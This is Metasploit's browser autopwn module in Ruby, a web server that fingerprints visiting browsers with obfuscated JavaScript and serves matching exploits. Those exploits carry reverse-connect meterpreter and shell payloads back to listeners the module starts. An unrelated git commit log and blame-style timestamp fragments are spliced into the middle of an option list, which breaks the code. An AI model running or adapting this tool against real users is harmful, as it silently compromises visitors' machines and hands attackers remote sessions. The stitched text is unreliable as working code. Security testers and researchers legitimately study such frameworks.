##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
# ideas:
# - add a loading page option so the user can specify arbitrary html to
# insert all of the evil js and iframes into
# - caching is broken when different browsers connect from the same IP address (e.g. several clients behind one NAT)
require 'msf/core'
require 'rex/exploitation/javascriptosdetect'
require 'rex/exploitation/jsobfu'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTP Client Automatic Exploiter',
'Version' => '$Revision$',
'Description' => %q{
This module has three actions. The first (and the default)
is 'WebServer' which uses a combination of client-side and
server-side techniques to fingerprint HTTP clients and then
automatically exploit them. Next is 'DefangedDetection' which
does only the fingerprinting part. Lastly, 'list' simply
prints the names of all exploit modules that would be used by
the WebServer action given the current MATCH and EXCLUDE
options.
Also adds a 'list' command which is the same as running with
ACTION=list.
},
'Author' =>
[
# initial concept, integration and extension of Jerome
# Athias' os_detect.js
'egypt',
],
'License' => BSD_LICENSE,
'Actions' =>
[
[ 'WebServer', {
'Description' => 'Start a bunch of modules and direct clients to appropriate exploits'
} ],
[ 'DefangedDetection', {
'Description' => 'Only perform detection, send no exploits'
} ],
[ 'list', {
'Description' => 'List the exploit modules that would be started'
} ]
],
'PassiveActions' =>
[ 'WebServer', 'DefangedDetection' ],
'DefaultOptions' => {
# Most of these exploits are expected to crash the browser once the payload has run, so
# default the InitialAutoRunScript to migrate out of the browser process immediately, where the session supports it.
"InitialAutoRunScript" => "migrate -f",
},
'DefaultAction' => 'WebServer'))
register_options([
OptAddress.new('LHOST', [true,
'The IP address to use for reverse-connect payloads'
])
], self.class)
register_advanced_options([
OptString.new('AutoRunScript', [false, "A script to automatically on session creation.", '']),
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
OptString.new('MATCH', [false,
'Only attempt to use exploits whose name matches this regex'
]),
OptString.new('EXCLUDE', [false,
'Only attempt to use exploits whose name DOES NOT match this regex'
]),
OptBool.new('DEBUG', [false,
'Do not obfuscate the javascript and print various bits of useful info to the browser',
false
]),
OptPort.new('LPORT_WIN32', [false,
'The port to use for Windows reverse-connect payloads', 3333
]),
OptString.new('PAYLOAD_WIN32', [false,
'The payload to use for Windows reverse-connect payloads',
'windows/meterpreter/reverse_tcp'
]),
OptPort.new('LPORT_LINUX', [false,
'The port to use for Linux reverse-connect payloads', 4444
]),
OptString.new('PAYLOAD_LINUX', [false,
'The payload to use for Linux reverse-connect payloads',
'linux/meterpreter/reverse_tcp'
]),
OptPort.new('LPORT_MACOS', [false,
'The port to use for Mac reverse-connect payloads', 5555
]),
OptString.new('PAYLOAD_MACOS', [false,
'The payload to use for Mac reverse-connect payloads',
'osx/meterpreter/reverse_tcp'
]),
OptPort.new('LPORT_GENERIC', [false,
'The port to use for generic reverse-connect payloads', 6666
]),
OptString.new('PAYLOAD_GENERIC', [false,
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 23:00:02 +00:00
|
|
|
'The payload to use for generic reverse-connect payloads',
|
2011-01-20 20:32:18 +00:00
|
|
|
'generic/shell_reverse_tcp'
|
2009-11-11 21:38:30 +00:00
|
|
|
]),
|
2010-08-30 21:36:38 +00:00
|
|
|
OptPort.new('LPORT_JAVA', [false,
|
2011-01-20 20:32:18 +00:00
|
|
|
'The port to use for Java reverse-connect payloads', 7777
|
|
|
|
]),
|
|
|
|
OptString.new('PAYLOAD_JAVA', [false,
|
|
|
|
'The payload to use for Java reverse-connect payloads',
|
|
|
|
'java/meterpreter/reverse_tcp'
|
2010-08-30 21:36:38 +00:00
|
|
|
]),
|
2008-08-08 06:00:30 +00:00
|
|
|
], self.class)
|
2008-07-01 01:44:56 +00:00
|
|
|
|
|
|
|
@exploits = Hash.new
|
2009-11-11 21:38:30 +00:00
|
|
|
@payloads = Hash.new
|
2009-07-22 20:14:35 +00:00
|
|
|
@targetcache = Hash.new
|
2010-03-04 07:37:58 +00:00
|
|
|
@current_victim = Hash.new
|
2010-09-21 22:43:50 +00:00
|
|
|
@handler_job_ids = []
|
2009-07-19 17:27:36 +00:00
|
|
|
end
##
# CommandDispatcher hooks: the extra console commands this module contributes
##
# Extra console commands contributed by this module (CommandDispatcher hook).
#
# @return [Hash{String => String}] command name mapped to its help text;
#   currently only 'list', which prints the exploits selected by the
#   MATCH and EXCLUDE options.
def auxiliary_commands
  list_help = "%red#{self.refname}%clr: List the exploits as filtered by MATCH and EXCLUDE"
  { 'list' => list_help }
end
# Console command 'list': print the name of every exploit module that
# each_autopwn_module yields (the help text describes this as the
# MATCH/EXCLUDE-filtered set) and reset @exploits to a hash of those
# names mapped to nil. No module is started here.
#
# @param args [Array] ignored; accepted for CommandDispatcher compatibility
# @return [void]
def cmd_list(*args)
  print_status("Listing Browser Autopwn exploits:")
  print_line

  # Rebuild the table from scratch; real module instances only land in
  # it via init_exploit when the WebServer action runs.
  @exploits = {}
  each_autopwn_module do |modname, _mod|
    @exploits[modname] = nil
    print_line modname
  end

  print_line
  print_status("Found #{@exploits.length} exploit modules")
end
##
# The actual exploit machinery: run/setup, starting the exploit modules
# and handlers, and serving requests
##
# Entry point; dispatches on the selected action. 'list' only prints
# module names; 'DefangedDetection' starts the fingerprinting web server
# (exploit()) without loading any exploit module; anything else (the
# default 'WebServer') loads the exploit modules first and gives up with
# false if none survived the MATCH/EXCLUDE/MinimumRank filtering.
#
# @return [false, Object] false when no exploit module could be started,
#   otherwise whatever cmd_list / exploit() returns
def run
  case action.name
  when 'list'
    cmd_list
  when 'DefangedDetection'
    # Same server-side flow as a real run, minus the exploit modules.
    exploit()
  else
    start_exploit_modules()
    # init_exploit drops modules that fail to load or fall below
    # @minrank, so an empty table means there is nothing to serve.
    if @exploits.empty?
      print_error("No exploits, check your MATCH and EXCLUDE settings")
      return false
    end
    exploit()
  end
end
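# Build everything that does not depend on which exploit modules end up
# loaded: the client-side fingerprinting script (@init_js), the landing
# page that carries it (@init_html), the per-platform LPORT/PAYLOAD
# selections and the minimum exploit rank (@minrank).
#
# Security notes for maintainers:
#  * The fingerprint comes back in the "sessid" query parameter as a
#    base64 string the client assembles itself. It is untrusted input;
#    record_detection (not part of this excerpt) must treat it as such.
#  * report_and_get_exploits eval()s the second-stage response body
#    wholesale. That is the delivery channel by design, which also means
#    anyone between the victim and SRVHOST can substitute it unless SSL
#    is enabled.
#
# Fix: an invalid MinimumRank used to be reported as "ignoring" but was
# not actually ignored; RankingName.invert[] returned nil and the rank
# comparison in init_exploit then raised. It now falls back to 'manual'.
#
# @return [void]
def setup
  print_status("Setup")

  @init_js = ::Rex::Exploitation::JavascriptOSDetect.new <<-ENDJS

    #{js_base64}

    function make_xhr() {
      var xhr;
      try {
        xhr = new XMLHttpRequest();
      } catch(e) {
        try {
          xhr = new ActiveXObject("Microsoft.XMLHTTP");
        } catch(e) {
          xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
        }
      }
      if (! xhr) {
        throw "failed to create XMLHttpRequest";
      }
      return xhr;
    }

    function report_and_get_exploits(detected_version) {
      var encoded_detection;
      xhr = make_xhr();
      xhr.onreadystatechange = function () {
        if (xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
          // Second stage: the server's reply is the exploit script.
          eval(xhr.responseText);
        }
      };

      // Join every detected property with ':' and base64 it into the
      // sessid query parameter.
      encoded_detection = new String();
      #{js_debug('navigator.userAgent+"<br><br>"')}
      for (var prop in detected_version) {
        #{js_debug('prop + " " + detected_version[prop] +"<br>"')}
        encoded_detection += detected_version[prop] + ":";
      }
      #{js_debug('"<br>"')}
      encoded_detection = Base64.encode(encoded_detection);
      xhr.open("GET", document.location + "?sessid=" + encoded_detection);
      xhr.send(null);
    }

    function bodyOnLoad() {
      var detected_version = window.os_detect.getVersion();
      //#{js_debug('detected_version')}
      report_and_get_exploits(detected_version);
    } // function bodyOnLoad
  ENDJS

  if (datastore['DEBUG'])
    print_debug("NOTE: Debug Mode; javascript will not be obfuscated")
  else
    pre = Time.now
    print_status("Obfuscating initial javascript #{pre}")
    @init_js.obfuscate
    print_status "Done in #{Time.now - pre} seconds"
  end

  # Landing page. The obfuscated symbol for bodyOnLoad has to be looked
  # up through @init_js.sym, since the name is rewritten above.
  @init_html = %Q|<html > <head > <title > Loading </title>\n|
  @init_html << %Q|<script language="javascript" type="text/javascript">|
  @init_html << %Q|<!-- \n #{@init_js} //-->|
  @init_html << %Q|</script> </head> |
  @init_html << %Q|<body onload="#{@init_js.sym("bodyOnLoad")}()"> |
  @init_html << %Q|<div id="foo"></div> |
  @init_html << %Q|<noscript> \n|
  # Don't use build_iframe here because it will break detection in
  # DefangedDetection mode when the target has js disabled.
  @init_html << %Q|<iframe src="#{self.get_resource}?ns=1"></iframe>|
  @init_html << %Q|</noscript> \n|
  @init_html << %Q|</body> </html> |

  #
  # I'm still not sold that this is the best way to do this, but random
  # LPORTs causes confusion when things break and breakage when firewalls
  # are in the way. I think the ideal solution is to have
  # self-identifying payloads so we'd only need 1 LPORT for multiple
  # stagers.
  #
  @win_lport = datastore['LPORT_WIN32']
  @win_payload = datastore['PAYLOAD_WIN32']
  @lin_lport = datastore['LPORT_LINUX']
  @lin_payload = datastore['PAYLOAD_LINUX']
  @osx_lport = datastore['LPORT_MACOS']
  @osx_payload = datastore['PAYLOAD_MACOS']
  @gen_lport = datastore['LPORT_GENERIC']
  @gen_payload = datastore['PAYLOAD_GENERIC']
  @java_lport = datastore['LPORT_JAVA']
  @java_payload = datastore['PAYLOAD_JAVA']

  # MinimumRank is read from the framework-wide datastore, not this
  # module's; exploits ranked below it are skipped by init_exploit.
  minrank = framework.datastore['MinimumRank'] || 'manual'
  unless RankingName.values.include?(minrank)
    print_error("MinimumRank invalid! Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})")
    wlog("MinimumRank invalid, ignoring", 'core', LEV_0)
    # Really ignore it: an unknown name would map to nil below and make
    # the Integer comparison in init_exploit raise.
    minrank = 'manual'
  end
  @minrank = RankingName.invert[minrank]
end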
# Instantiate one exploit module, configure it to serve under our
# SRVHOST/SRVPORT with a reverse payload on the platform-specific LPORT,
# and start it as a background job. On success the job's own copy of the
# module is stored in @exploits[name]; on any failure the name is removed
# from @exploits again.
#
# Relies on state set elsewhere: @minrank (setup) and @lhost
# (start_exploit_modules).
#
# @param name [String] module reference name, e.g. "windows/browser/..."
# @param mod  [Class, nil] module class to instantiate instead of looking
#   name up in framework.modules
# @param targ [Integer] target index handed to exploit_simple
# @return [true, false, nil] true when the job is running; false when the
#   module was filtered by MinimumRank or its job never appeared; nil when
#   reload_module failed (callers only test for truthiness)
def init_exploit(name, mod = nil, targ = 0)
  instance = mod.nil? ? framework.modules.create(name) : mod.new
  # Always work on a freshly reloaded copy so on-disk edits are picked up.
  @exploits[name] = framework.modules.reload_module(instance)

  if @exploits[name].nil?
    # Reload failed; drop the entry and report failure (nil) to the caller.
    @exploits.delete(name)
    return
  end

  # Skip anything ranked below the configured minimum (see setup).
  if @exploits[name].class.autopwn_opts[:rank] < @minrank
    @exploits.delete(name)
    return false
  end

  # Pick the payload/LPORT pair by platform, keyed off the module name.
  # Linux and OS X are not wired up yet (the original code carried a
  # commented-out "some day" block for them), so they take the generic
  # reverse-connect payload. Java is matched on "/java_" rather than
  # "java" so names such as mozilla_navigatorjava don't get a Java
  # payload; checking the module's declared platform would be more robust.
  payload, lport =
    case name
    when %r{windows} then [@win_payload, @win_lport]
    when %r{/java_}  then [@java_payload, @java_lport]
    else                  [@gen_payload, @gen_lport]
    end
  # NOTE: keyed by port, so two platforms sharing an LPORT but configured
  # with different payloads leave only the last payload for the handler.
  @payloads[lport] = payload

  print_status("Starting exploit #{name} with payload #{payload}")

  ds = @exploits[name].datastore
  ds['SRVHOST'] = datastore['SRVHOST']
  ds['SRVPORT'] = datastore['SRVPORT']

  # In DEBUG mode the exploit URI is the module name so it is obvious
  # from the browser which exploit a request hits; otherwise it is
  # randomised here rather than set to nil, because nil would let a
  # saved value from the user's configuration win.
  ds['URIPATH'] =
    if datastore['DEBUG']
      name
    else
      Rex::Text.rand_text_alpha(rand(10) + 4)
    end

  ds['WORKSPACE'] = datastore["WORKSPACE"] if datastore["WORKSPACE"]
  ds['MODULE_OWNER'] = self.owner
  ds['ParentUUID'] = datastore["ParentUUID"] if datastore["ParentUUID"]
  ds['AutopwnUUID'] = self.uuid
  ds['LPORT'] = lport
  ds['LHOST'] = @lhost
  ds['SSL'] = datastore['SSL']
  ds['SSLVersion'] = datastore['SSLVersion']
  ds['EXITFUNC'] = datastore['EXITFUNC'] || 'thread'
  # start_exploit_modules runs one multi/handler per LPORT; the exploit
  # itself must not bind its own listener.
  ds['DisablePayloadHandler'] = true

  @exploits[name].exploit_simple(
    'LocalInput'  => self.user_input,
    'LocalOutput' => self.user_output,
    'Target'      => targ,
    'Payload'     => payload,
    'RunAsJob'    => true)

  # The job registers its resources asynchronously; give it a moment so
  # get_resource exists when we need it. This is a fixed delay, so a
  # slow host can still lose the race.
  Rex::ThreadSafe.sleep(0.5)

  job = framework.jobs[@exploits[name].job_id.to_s]
  if job.nil?
    print_error("Failed to start exploit module #{name}")
    @exploits.delete(name)
    return false
  end

  # Since r9714 or so exploit_simple runs a copy of the module inside the
  # job; keep that copy so mod.get_resource reflects the live instance.
  @exploits[name] = job.ctx[0]
  true
end
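# Load every autopwn-capable exploit module, build the client-side test
# (vuln_test) that decides whether a given browser gets it, start one
# multi/handler per distinct LPORT, and sort the tests by rank.
#
# Populates @lhost, @js_tests (tests that need JavaScript, keyed by
# browser name or "generic"), @noscript_tests (same, for the <noscript>
# path) and @handler_job_ids. Must run after setup(), which provides
# @init_js and the per-platform LPORT/PAYLOAD values.
#
# Fixes relative to the previous version:
#  * the single-method ActiveX case interpolated the undefined local
#    `method` (which resolves to Kernel#method and raises with no
#    argument); it now uses apo[:method];
#  * a non-Array classid produced an empty "if () {" test, i.e. a JS
#    syntax error for the whole page; scalars are now accepted and an
#    empty condition list emits no test at all;
#  * the handler list is de-duplicated so two platforms sharing an LPORT
#    don't try to bind the same listener twice.
#
# @return [void]
def start_exploit_modules()
  # NOTE: 0.0.0.0 is a bind address, not something a victim can connect
  # back to; with LHOST unset every reverse payload is handed an
  # unusable host. Operators should always set LHOST explicitly.
  @lhost = (datastore['LHOST'] || "0.0.0.0")

  @js_tests = {}
  @noscript_tests = {}

  print_line
  print_status("Starting exploit modules on host #{@lhost}...")
  print_status("---")
  print_line

  each_autopwn_module do |name, mod|
    # Start the module first; if that fails there is no point in
    # building tests for it.
    next if !(init_exploit(name))

    apo = mod.autopwn_opts.dup
    apo[:name] = name.dup
    apo[:vuln_test] ||= ""

    if apo[:classid]
      # An ActiveX-based IE exploit: probe for the control with
      # testAXO(classid, method). classid and method may each be a single
      # value or an Array; every combination is tried. Both come from the
      # module's own metadata, which is why interpolating them unescaped
      # into JS string literals is acceptable here.
      apo[:vuln_test] = ""
      apo[:ua_name] = HttpClients::IE
      conditions = []
      Array(apo[:classid]).each do |clsid|
        Array(apo[:method]).each do |m|
          conditions.push "testAXO('#{clsid}', '#{m}')"
        end
      end
      # Only emit a test when there is something to test; an empty
      # vuln_test is handled below (and by the response builder) rather
      # than breaking the script with "if () {".
      unless conditions.empty?
        apo[:vuln_test] << "if (#{conditions.join("||")}) {\n"
        apo[:vuln_test] << "  is_vuln = true;\n"
        apo[:vuln_test] << "}\n"
      end
    end

    # Optional browser version bounds. ua_ver_lt/ua_ver_gt come from
    # javascriptosdetect; they and detected_version are looked up through
    # @init_js.sym so the names survive obfuscation.
    js_d_ver = @init_js.sym("detected_version")
    if apo[:ua_minver] and apo[:ua_maxver]
      ver_test =
        "!#{@init_js.sym("ua_ver_lt")}(#{js_d_ver}['ua_version'], '#{apo[:ua_minver]}') && " +
        "!#{@init_js.sym("ua_ver_gt")}(#{js_d_ver}['ua_version'], '#{apo[:ua_maxver]}')"
    elsif apo[:ua_minver]
      ver_test = "!#{@init_js.sym("ua_ver_lt")}(#{js_d_ver}['ua_version'], '#{apo[:ua_minver]}')"
    elsif apo[:ua_maxver]
      ver_test = "!#{@init_js.sym("ua_ver_gt")}(#{js_d_ver}['ua_version'], '#{apo[:ua_maxver]}')"
    else
      ver_test = nil
    end

    # Wrap the vulnerability test in the version check; a module with no
    # test of its own is assumed vulnerable whenever the version matches.
    if ver_test
      test = "if (#{ver_test}) { "
      test << (apo[:vuln_test].empty? ? "is_vuln = true;" : apo[:vuln_test])
      test << "} else { is_vuln = false; }\n"
      apo[:vuln_test] = test
    end

    # File the test under requires-scripting / no-scripting, per browser
    # name, with "generic" for modules that don't name a browser.
    bucket = apo[:javascript] ? @js_tests : @noscript_tests
    key = apo[:ua_name] || "generic"
    bucket[key] ||= []
    bucket[key].push(apo)
  end

  # One multi/handler per distinct LPORT. @payloads is keyed by port (see
  # init_exploit), so duplicates would carry the same payload anyway.
  [@win_lport, @lin_lport, @osx_lport, @gen_lport, @java_lport].compact.uniq.each do |lport|
    next unless @payloads[lport]

    print_status("Starting handler for #{@payloads[lport]} on port #{lport}")
    multihandler = framework.modules.create("exploit/multi/handler")
    multihandler.datastore['MODULE_OWNER'] = self.datastore['MODULE_OWNER']
    multihandler.datastore['WORKSPACE'] = datastore["WORKSPACE"] if datastore["WORKSPACE"]
    multihandler.datastore['ParentUUID'] = datastore["ParentUUID"] if datastore["ParentUUID"]
    multihandler.datastore['CAMPAIGN_ID'] = datastore["CAMPAIGN_ID"] if datastore["CAMPAIGN_ID"]
    multihandler.datastore['BAP'] = true
    multihandler.datastore['AutopwnUUID'] = self.uuid
    multihandler.datastore['LPORT'] = lport
    multihandler.datastore['LHOST'] = @lhost
    multihandler.datastore['ExitOnSession'] = false
    multihandler.datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread'
    multihandler.datastore["ReverseListenerBindAddress"] = datastore["ReverseListenerBindAddress"]
    # Post-session automation is only passed through for the Windows and
    # Java ports (meterpreter); revisit when other platforms get it.
    if (lport == @win_lport or lport == @java_lport)
      multihandler.datastore['AutoRunScript'] = datastore['AutoRunScript']
      multihandler.datastore['AutoSystemInfo'] = datastore['AutoSystemInfo']
      multihandler.datastore['InitialAutoRunScript'] = datastore['InitialAutoRunScript']
    end
    multihandler.exploit_simple(
      'LocalInput' => self.user_input,
      'LocalOutput' => self.user_output,
      'Payload' => @payloads[lport],
      'RunAsJob' => true)
    @handler_job_ids.push(multihandler.job_id)
  end

  # Let the handlers get set up (fixed delay; see the same caveat in
  # init_exploit).
  Rex::ThreadSafe.sleep(0.5)

  print_line
  print_status("--- Done, found %bld%grn#{@exploits.length}%clr exploit modules")
  print_line

  # Highest rank first, so the most reliable exploit is tried first.
  # Ordering matters less for the noscript set, which is served as a pile
  # of iframes the browser loads semi-concurrently, but sort it anyway.
  [@js_tests, @noscript_tests].each do |tests_by_browser|
    tests_by_browser.each_value do |tests|
      tests.sort! { |a, b| b[:rank] <=> a[:rank] }
    end
  end
end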
#
# Main dispatcher: called for every HTTP request the server receives
# (see on_request_uri below)
#
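# HTTP request dispatcher for the autopwn server. Three URLs are served
# under our resource path:
#   <resource>             the landing page carrying the fingerprinting JS
#   <resource>?sessid=...  the exploit page, requested by that JS with the
#                          base64 fingerprint in the query string
#   <resource>?ns=1        the <noscript> fallback, User-Agent only
# Anything else gets a 404.
#
# The sessid value and the User-Agent header are controlled by whoever
# visits the page; record_detection and the response builders are not
# part of this excerpt and must treat them as untrusted. Every page is
# served with Expires: 0 / must-revalidate so a browser re-fetches
# instead of replaying a cached exploit page.
#
# Fix: get_resource (the operator-configured URIPATH) is now
# Regexp.escape'd before being interpolated into the match patterns, and
# the patterns are anchored at the start of the URI.
#
# @param cli [Rex::Proto::Http::ServerClient] the connected client
# @param request [Rex::Proto::Http::Request] the parsed request; #uri
#   includes the query string
# @return [false, Object] false for unknown URIs, otherwise the result of
#   cli.send_response
def on_request_uri(cli, request)
  print_status("Handling '#{request.uri}'")

  # A '.' or '+' in URIPATH would otherwise match loosely.
  resource = Regexp.escape(self.get_resource)

  case request.uri
  when self.get_resource
    # First contact: hand out the fingerprinter and wait for it to call
    # back. If it never does, scripting is off and the <noscript> iframe
    # in the page fetches ?ns=1 instead, leaving us to guess from the UA.
    response = create_response()
    response["Expires"] = "0"
    response["Cache-Control"] = "must-revalidate"
    response.body = @init_html
    cli.send_response(response)

  when %r{\A#{resource}.*sessid=}
    # JavaScript callback carrying the base64 fingerprint.
    record_detection(cli, request)
    if (action.name == "DefangedDetection")
      response = create_response()
      response.body = "#{js_debug("'Please wait'")}"
    else
      response = build_script_response(cli, request)
    end
    response["Expires"] = "0"
    response["Cache-Control"] = "must-revalidate"
    cli.send_response(response)

  when %r{\A#{resource}.*ns=1}
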